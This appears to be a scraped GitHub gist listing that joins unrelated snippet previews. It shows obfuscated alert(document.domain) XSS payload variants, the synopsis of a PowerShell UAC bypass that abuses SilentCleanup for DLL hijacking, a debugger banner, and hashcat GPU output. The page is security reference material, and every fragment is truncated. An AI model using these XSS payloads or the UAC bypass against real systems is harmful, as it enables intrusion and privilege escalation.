Please see: https://github.com/kevinSuttle/html-meta-tags, thanks for the idea @dandv!
Copied from http://code.lancepollard.com/complete-list-of-html-meta-tags/
| // How many ways can you alert(document.domain)? | |
| // Comment with more ways and I'll add them :) | |
| // I already know about the JSFuck way, but it's too long to add (: | |
| // Direct invocation | |
| alert(document.domain); | |
| (alert)(document.domain); | |
| al\u0065rt(document.domain); | |
| al\u{65}rt(document.domain); | |
| window['alert'](document.domain); |
| function Invoke-UACBypass { | |
| <# | |
| .SYNOPSIS | |
| Bypasses UAC on Windows 10 by abusing the SilentCleanup task to win a race condition, allowing for a DLL hijack without a privileged file copy. | |
| Author: Matthew Graeber (@mattifestation), Matt Nelson (@enigma0x3) | |
| License: BSD 3-Clause | |
| Required Dependencies: None | |
| Optional Dependencies: None |
| Microsoft (R) Windows Debugger Version 6.2.9200.16384 X86 | |
| Copyright (c) Microsoft Corporation. All rights reserved. | |
| *** wait with pending attach | |
| Symbol search path is: *** Invalid *** | |
| **************************************************************************** | |
| * Symbol loading may be unreliable without a symbol search path. * | |
| * Use .symfix to have the debugger choose a symbol path. * | |
| * After setting your symbol path, use .reload to refresh symbol locations. * |
| System: Sagitta Brutalis (S2480-RAD-290X) with 8x 290X | |
| https://sagitta.systems/hardware/gpu-compute-nodes/brutalis/ | |
| epixoip@token:~/oclHashcat-1.00$ od6config --list | |
| Adapter 0: AMD Radeon R9 290 Series | |
| Adapter 1: AMD Radeon R9 290 Series | |
| Adapter 2: AMD Radeon R9 290 Series | |
| Adapter 3: AMD Radeon R9 290 Series |